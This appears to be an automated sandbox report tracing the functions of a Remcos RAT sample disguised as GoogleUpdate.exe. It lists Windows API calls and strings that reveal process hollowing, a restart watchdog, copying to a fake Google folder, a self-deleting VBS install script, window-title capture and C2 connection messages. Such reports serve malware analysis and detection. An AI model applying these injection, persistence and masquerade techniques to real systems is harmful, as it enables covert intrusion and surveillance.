VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,00472200), ref: 0041662B
NtClose.NTDLL(?), ref: 00416635
TerminateProcess.KERNEL32(?,00000000,?,?,?,?,?,00472200), ref: 0041663F
GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040,?,?,?,?,?,00472200), ref: 0041667F
NtMapViewOfSection.NTDLL(?,00000000,?,?,?,?,?,00472200), ref: 0041668A
WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00416749
Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00416766
ResumeThread.KERNEL32(?), ref: 00416773
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,00472200), ref: 0041678A
GetCurrentProcess.KERNEL32(?,?,?,?,?,?,00472200), ref: 00416795
NtUnmapViewOfSection.NTDLL(00000000), ref: 0041679C
NtClose.NTDLL(?), ref: 004167A6
TerminateProcess.KERNEL32(?,00000000,?,?,?,?,?,00472200), ref: 004167B0
GetLastError.KERNEL32(?,?,?,?,?,00472200), ref: 004167B8

Strings

ZwCreateSection, xrefs: 0041645A
ntdll, xrefs: 0041645F, 0041647E, 00416492, 004164A6
ZwClose, xrefs: 004164A1
ZwUnmapViewOfSection, xrefs: 0041648D
ZwMapViewOfSection, xrefs: 00416479

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: Process$Section$AddressHandleModuleProcView$ThreadVirtual$CloseContextCreateCurrentFreeMemoryTerminateUnmapWow64$AllocErrorLastReadResumeWrite
String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
API String ID: 3150337530-3035715614
Opcode ID: 95136cae06b6c6de2e48ba00139107378fb37b92ff4b2ee653c99aadd9b5648f
Instruction ID: 94204e0ceb90eb3d518cc699b6b418d02f123724867831e7a48fec904b930286
Opcode Fuzzy Hash: 95136cae06b6c6de2e48ba00139107378fb37b92ff4b2ee653c99aadd9b5648f
Instruction Fuzzy Hash: 9CA18E71604300AFDB109F64DC85F6B7BE8FB48749F00092AF695D62A1E7B8EC44CB5A

Function 00410B5C Relevance: 35.2, APIs: 7, Strings: 13, Instructions: 238
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 00410B6B

Part of subcall function 00412268: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 00412276
Part of subcall function 00412268: RegSetValueExA.KERNEL32(?,?,00000000,00000004,?,00000004,?,?,?,00410B8A,0046403C,00000000), ref: 00412291
Part of subcall function 00412268: RegCloseKey.KERNEL32(?,?,?,?,00410B8A,0046403C,00000000), ref: 0041229C

OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410BAB
CloseHandle.KERNEL32(00000000), ref: 00410BBA
CreateThread.KERNEL32(00000000,00000000,00411253,00000000,00000000,00000000), ref: 00410C10
OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00410E7F

Strings

\SysWOW64\, xrefs: 00410CC6
rmclient.exe, xrefs: 00410D4F
Watchdog module activated, xrefs: 00410BE9, 00410E41
\system32\, xrefs: 00410C6E
WDH, xrefs: 00410C1A, 00410C20, 00410E85
T/F, xrefs: 00410BD2
Watchdog launch failed!, xrefs: 00410DE8
fsutil.exe, xrefs: 00410D74
Remcos restarted by watchdog!, xrefs: 00410BC5
0gj, xrefs: 00410C47
WinDir, xrefs: 00410C80, 00410CD5
svchost.exe, xrefs: 00410D2A
(#G, xrefs: 00410B98

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
String ID: (#G$0gj$Remcos restarted by watchdog!$T/F$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
API String ID: 3018269243-793568179
Opcode ID: e7a9a9d739bdae95c955215bb3ec3bd21588d81e8875e4da25406932dfd67bcf
Instruction ID: e4f63523a9081b51a3adb9d06d528b7104d503695ba60a117a14e5ebfa22ea95
Opcode Fuzzy Hash: e7a9a9d739bdae95c955215bb3ec3bd21588d81e8875e4da25406932dfd67bcf
Instruction Fuzzy Hash: DD71923160430167C604FB62DD67DAE73A8AE91308F50097FF546621E2EEBC9E49C69F

Function 0040E18D Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 90
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00411F34: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00411F54
Part of subcall function 00411F34: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,00472200), ref: 00411F72
Part of subcall function 00411F34: RegCloseKey.KERNEL32(?), ref: 00411F7D

Sleep.KERNEL32(00000BB8), ref: 0040E243
ExitProcess.KERNEL32 ref: 0040E2B4

Strings

override, xrefs: 0040E1B2
3.8.0 Pro, xrefs: 0040E21E, 0040E28D
0gj, xrefs: 0040E19E, 0040E1E6, 0040E255
pth_unenc, xrefs: 0040E1A3, 0040E1EC, 0040E25B

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: CloseExitOpenProcessQuerySleepValue
String ID: 0gj$3.8.0 Pro$override$pth_unenc
API String ID: 2281282204-469497953
Opcode ID: 31277eddf5376791683a2ccb2ca395caa34c6e3dbc7f718eb6fe82f8c46a5739
Instruction ID: b884fba6e00cc138548ee74cf6c0f0a6577cc223cd772b3e63c92b5116f64211
Opcode Fuzzy Hash: 31277eddf5376791683a2ccb2ca395caa34c6e3dbc7f718eb6fe82f8c46a5739
Instruction Fuzzy Hash: 6E213770B4030027DA08B6768D5BAAE35899B82708F40446FF911AB2D7EEBD8D4583DF

Function 0040E2BB Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00413F34,00471E78,00472910,00471E78,00000000,00471E78,00000000,00471E78,3.8.0 Pro), ref: 0040E2CF

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 4f9fc82b5c10d6610e5ed6531d98e333281f4b2b56e24c5c8b0cdbea65e89b46
Instruction ID: e43a985d938ffd5d313bbeec62feab64fa47c80c67ee5e1720aa7bcbe65aeca7
Opcode Fuzzy Hash: 4f9fc82b5c10d6610e5ed6531d98e333281f4b2b56e24c5c8b0cdbea65e89b46
Instruction Fuzzy Hash: 65D05E30B4421C7BEA10D6859C0AEAA7B9CD701B62F0001A6BA08D72D0E9E1AE0487E6

Function 0041A8DA Relevance: 105.1, APIs: 36, Strings: 24, Instructions: 130
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A8EF
GetProcAddress.KERNEL32(00000000), ref: 0041A8F8
GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A90F
GetProcAddress.KERNEL32(00000000), ref: 0041A912
LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A924
GetProcAddress.KERNEL32(00000000), ref: 0041A927
GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A93D
GetProcAddress.KERNEL32(00000000), ref: 0041A940
GetModuleHandleA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D40C), ref: 0041A951
GetProcAddress.KERNEL32(00000000), ref: 0041A954
GetModuleHandleA.KERNEL32(user32,SetProcessDpiAware,?,?,?,?,0040D40C), ref: 0041A969
GetProcAddress.KERNEL32(00000000), ref: 0041A96C
LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,?,?,?,0040D40C), ref: 0041A97D
GetProcAddress.KERNEL32(00000000), ref: 0041A980
LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,0040D40C), ref: 0041A98C
GetProcAddress.KERNEL32(00000000), ref: 0041A98F
GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D40C), ref: 0041A9A1
GetProcAddress.KERNEL32(00000000), ref: 0041A9A4
GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D40C), ref: 0041A9B1
GetProcAddress.KERNEL32(00000000), ref: 0041A9B4
LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D40C), ref: 0041A9C5
GetProcAddress.KERNEL32(00000000), ref: 0041A9C8
GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D40C), ref: 0041A9D5
GetProcAddress.KERNEL32(00000000), ref: 0041A9D8
GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D40C), ref: 0041A9EA
GetProcAddress.KERNEL32(00000000), ref: 0041A9ED
GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D40C), ref: 0041A9FA
GetProcAddress.KERNEL32(00000000), ref: 0041A9FD
GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D40C), ref: 0041AA0A
GetProcAddress.KERNEL32(00000000), ref: 0041AA0D
GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemTimes,?,?,?,?,0040D40C), ref: 0041AA1F
GetProcAddress.KERNEL32(00000000), ref: 0041AA22
LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C,?,?,?,?,0040D40C), ref: 0041AA30
GetProcAddress.KERNEL32(00000000), ref: 0041AA33
LoadLibraryA.KERNEL32(kernel32.dll,GetConsoleWindow,?,?,?,?,0040D40C), ref: 0041AA40
GetProcAddress.KERNEL32(00000000), ref: 0041AA43

Strings

Shlwapi.dll, xrefs: 0041AA26
GetModuleFileNameExW, xrefs: 0041A919, 0041A91E, 0041A937
SetProcessDpiAware, xrefs: 0041A95F
SetProcessDEPPolicy, xrefs: 0041A9CA
SetProcessDpiAwareness, xrefs: 0041A947
GetMonitorInfoW, xrefs: 0041A9FF
GetComputerNameExW, xrefs: 0041A9A6
ntdll.dll, xrefs: 0041A978
EnumDisplayMonitors, xrefs: 0041A9EF
Kernel32.dll, xrefs: 0041A90A, 0041A938
GetModuleFileNameExA, xrefs: 0041A8E4, 0041A8E9, 0041A909
Psapi.dll, xrefs: 0041A8EA, 0041A91F
kernel32, xrefs: 0041A996, 0041A9A0, 0041A9AB, 0041A9CF
shcore, xrefs: 0041A94C
user32, xrefs: 0041A964, 0041A9DF, 0041A9E9, 0041A9F4, 0041AA04
EnumDisplayDevicesW, xrefs: 0041A9DA
GlobalMemoryStatusEx, xrefs: 0041A982
kernel32.dll, xrefs: 0041A987, 0041AA14, 0041AA1E, 0041AA3A
IsWow64Process, xrefs: 0041A991
Shell32, xrefs: 0041A9BB
GetConsoleWindow, xrefs: 0041AA35
NtUnmapViewOfSection, xrefs: 0041A973
GetSystemTimes, xrefs: 0041AA0F
IsUserAnAdmin, xrefs: 0041A9B6

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleModule$LibraryLoad
String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetModuleFileNameExA$GetModuleFileNameExW$GetMonitorInfoW$GetSystemTimes$GlobalMemoryStatusEx$IsUserAnAdmin$IsWow64Process$Kernel32.dll$NtUnmapViewOfSection$Psapi.dll$SetProcessDEPPolicy$SetProcessDpiAware$SetProcessDpiAwareness$Shell32$Shlwapi.dll$kernel32$kernel32.dll$ntdll.dll$shcore$user32
API String ID: 551388010-2474455403
Opcode ID: e80cee8c84c8c84204283680f0404711a146afcd0be7a07adf6e8d3a182e926f
Instruction ID: 1e7ebd14e1f9a52016720e07cc743ec1e909bc11fdf6f09267ddb838bd68d733
Opcode Fuzzy Hash: e80cee8c84c8c84204283680f0404711a146afcd0be7a07adf6e8d3a182e926f
Instruction Fuzzy Hash: 9031EBF0E413587ADB207BBA5C09E5B3E9CDA80794711052BB408D3661FAFC9C448E6E

Function 00413980 Relevance: 42.8, APIs: 5, Strings: 19, Instructions: 785
sleepnetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000,00000029,74DF0F10,00471FFC,00000000), ref: 004139D1
WSAGetLastError.WS2_32(00000000,00000001), ref: 00413BE2
Sleep.KERNEL32(00000000,00000002), ref: 004144C7

Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4

Strings

TLS On , xrefs: 00413B49
Connecting | , xrefs: 00413B5E
C:\ProgramData\GoogleDat\GoogleUpdate.exe, xrefs: 00413E16
%I64u, xrefs: 00413D4C
name, xrefs: 00413DBC
| , xrefs: 00413B68, 00413CA9
Exe, xrefs: 00413E37
`"G, xrefs: 00413F36
3.8.0 Pro, xrefs: 00413F03
Connected | , xrefs: 00413CA4
Connection Error: Unable to create socket, xrefs: 00413C40
P0F, xrefs: 00413A15
Connection Error: , xrefs: 00413BF5
hlight, xrefs: 00413DE9
TLS Off, xrefs: 00413B3B
Attempt-S4A0CI, xrefs: 00413E6E
H"G, xrefs: 00413D96
0gj, xrefs: 00413E30
Disconnected, xrefs: 00414437

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: Sleep$ErrorLastLocalTime
String ID: | $%I64u$0gj$3.8.0 Pro$Attempt-S4A0CI$C:\ProgramData\GoogleDat\GoogleUpdate.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$Exe$H"G$P0F$TLS Off$TLS On $`"G$hlight$name
API String ID: 524882891-1634896758
Opcode ID: 272676ed62c4a422cbf887dd148861ebdac9e0642bbe42505efa71915bb19c24
Instruction ID: 5f58eceae2704c6c0e376aa481a0c6a7ef3cc820e2c63ea8d389b44db61c6c97
Opcode Fuzzy Hash: 272676ed62c4a422cbf887dd148861ebdac9e0642bbe42505efa71915bb19c24
Instruction Fuzzy Hash: 9F42AE31A001055BCB18F765DDA6AEEB3699F90308F1041BFF40A721E2EF785F868A5D

Function 0040B871 Relevance: 42.3, APIs: 10, Strings: 14, Instructions: 296
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcslen.LIBCMT ref: 0040B882
CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00471FFC), ref: 0040B89B
CopyFileW.KERNEL32(C:\ProgramData\GoogleDat\GoogleUpdate.exe,00000000,00000000,00000000,00000000,00000000,?,00471FFC), ref: 0040B952
_wcslen.LIBCMT ref: 0040B968
CopyFileW.KERNEL32(C:\ProgramData\GoogleDat\GoogleUpdate.exe,00000000,00000000,00000000), ref: 0040B9E0
SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BA22
_wcslen.LIBCMT ref: 0040BA25
SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BA3C
ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040BC2A
ExitProcess.KERNEL32 ref: 0040BC36

Strings

6, xrefs: 0040B95C
C:\ProgramData\GoogleDat\GoogleUpdate.exe, xrefs: 0040B916, 0040B91B, 0040B94B, 0040B9DA, 0040B9DF, 0040B9E6, 0040BAAA
Temp, xrefs: 0040BA43
""", 0, xrefs: 0040BB47
open, xrefs: 0040BC24
fso.DeleteFile , xrefs: 0040BAB6
t<F, xrefs: 0040BA91
\install.vbs, xrefs: 0040BA3E
Set fso = CreateObject("Scripting.FileSystemObject"), xrefs: 0040BA7B
WScript.Sleep 1000, xrefs: 0040BA6D
CreateObject("WScript.Shell").Run "cmd /c "", xrefs: 0040BB57
$.F, xrefs: 0040BA9D
0gj, xrefs: 0040B8C6, 0040B8F8, 0040BB56
fso.DeleteFile(Wscript.ScriptFullName), xrefs: 0040BBD2

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: File$_wcslen$AttributesCopy$CreateDirectoryExecuteExitProcessShell
String ID: """, 0$$.F$0gj$6$C:\ProgramData\GoogleDat\GoogleUpdate.exe$CreateObject("WScript.Shell").Run "cmd /c ""$Set fso = CreateObject("Scripting.FileSystemObject")$Temp$WScript.Sleep 1000$\install.vbs$fso.DeleteFile $fso.DeleteFile(Wscript.ScriptFullName)$open$t<F
API String ID: 2743683619-732854040
Opcode ID: 3a838ee5c97b6ce66455d5266be73dab1649055cc2c5860905860c34101a79b9
Instruction ID: 1f37921bc36cc04280d9be7a1af933bc03f5727a4608831148a2c1203a4a5f71
Opcode Fuzzy Hash: 3a838ee5c97b6ce66455d5266be73dab1649055cc2c5860905860c34101a79b9
Instruction Fuzzy Hash: CA9161712083415BC218F766DC92EAF77D8AF90708F50043FF546A61E2EE7C9A49C69E

Function 00409C1F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 156
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__Init_thread_footer.LIBCMT ref: 00409C81
Sleep.KERNEL32(000001F4), ref: 00409C8C
GetForegroundWindow.USER32 ref: 00409C92
GetWindowTextLengthW.USER32(00000000), ref: 00409C9B
GetWindowTextW.USER32(00000000,00000000,00000000), ref: 00409CCF
Sleep.KERNEL32(000003E8), ref: 00409D9D

Part of subcall function 0040962E: SetEvent.KERNEL32(?,?,?,0040A77B,?,?,?,?,?,00000000), ref: 0040965A

Strings

], xrefs: 00409D31
[, xrefs: 00409D37
minutes }, xrefs: 00409DC3
{ User has been idle for , xrefs: 00409DCF

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: Window$SleepText$EventForegroundInit_thread_footerLength
String ID: [${ User has been idle for $ minutes }$]
API String ID: 911427763-3954389425
Opcode ID: 19a43bdacbb328f3271daa1859423f0074a75d4c81a0c0d14bd138b107996052
Instruction ID: 7a62ae1493acfbf190be1d0992f15f5c774c3bdccfea44e4f2dca48363f02a21
Opcode Fuzzy Hash: 19a43bdacbb328f3271daa1859423f0074a75d4c81a0c0d14bd138b107996052
Instruction Fuzzy Hash: 7C5193716043405BD304FB61D855A6EB795AF84308F50093FF486A62E3DF7CAE45C69A

Function 0040C5ED Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040C753

Strings

\system32, xrefs: 0040C667
SystemDrive, xrefs: 0040C64A
AppData, xrefs: 0040C70A
Temp, xrefs: 0040C61F
ProgramFiles, xrefs: 0040C727
ProgramData, xrefs: 0040C718
\SysWOW64, xrefs: 0040C6B9
WinDir, xrefs: 0040C654, 0040C676, 0040C6C8
UserProfile, xrefs: 0040C711

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: LongNamePath
String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
API String ID: 82841172-425784914
Opcode ID: 9bca3063e7748e5d89d1a68f7bdf515c31fa044ed2c65757ea3bf61848a421f7
Instruction ID: e0747f7f0ded3e76473395fd4b63a7f1dfd4675be44f898a7a0c8db3d1efc66a
Opcode Fuzzy Hash: 9bca3063e7748e5d89d1a68f7bdf515c31fa044ed2c65757ea3bf61848a421f7
Instruction Fuzzy Hash: EB4168315042419AC204FB62DC929EFB7E8AEA4759F10063FF541720E2EF799E49C99F

Function 0040971E Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 163
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00001388), ref: 00409738

Part of subcall function 0040966D: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409745), ref: 004096A3
Part of subcall function 0040966D: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409745), ref: 004096B2
Part of subcall function 0040966D: Sleep.KERNEL32(00002710,?,?,?,00409745), ref: 004096DF
Part of subcall function 0040966D: CloseHandle.KERNEL32(00000000,?,?,?,00409745), ref: 004096E6

CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409774
GetFileAttributesW.KERNEL32(00000000), ref: 00409785
SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040979C
PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409816

Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040983B), ref: 0041A228

SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00469654,?,00000000,00000000,00000000,00000000,00000000), ref: 0040991F

Strings

H"G, xrefs: 004097FA
H"G, xrefs: 004097EF
88i, xrefs: 00409759, 00409769

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
String ID: 88i$H"G$H"G
API String ID: 3795512280-3329683282
Opcode ID: f33fbd7251cf8f422bdd2e6f674448c5445aa46a64e6695c80c10c4b7cfcd9c5
Instruction ID: 85d6828eff9e87111454ffe40de9a07a949f8ec8799fb43d86416e8e02d17308
Opcode Fuzzy Hash: f33fbd7251cf8f422bdd2e6f674448c5445aa46a64e6695c80c10c4b7cfcd9c5
Instruction Fuzzy Hash: 9D513D712043015BCB14BB72C9A6ABF76999F90308F00453FB946B72E3DF7D9D09869A

Function 004048A8 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 144
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4

CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 004049E0

Strings

TLS Error 2, xrefs: 00404935
TLS Error 3, xrefs: 004049B8
TLS Handshake... | , xrefs: 004048E4
TLS Error 1, xrefs: 00404917
TLS Authentication Failed, xrefs: 00404979
Connection Refused, xrefs: 00404A56
Connection Failed: , xrefs: 00404A23

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
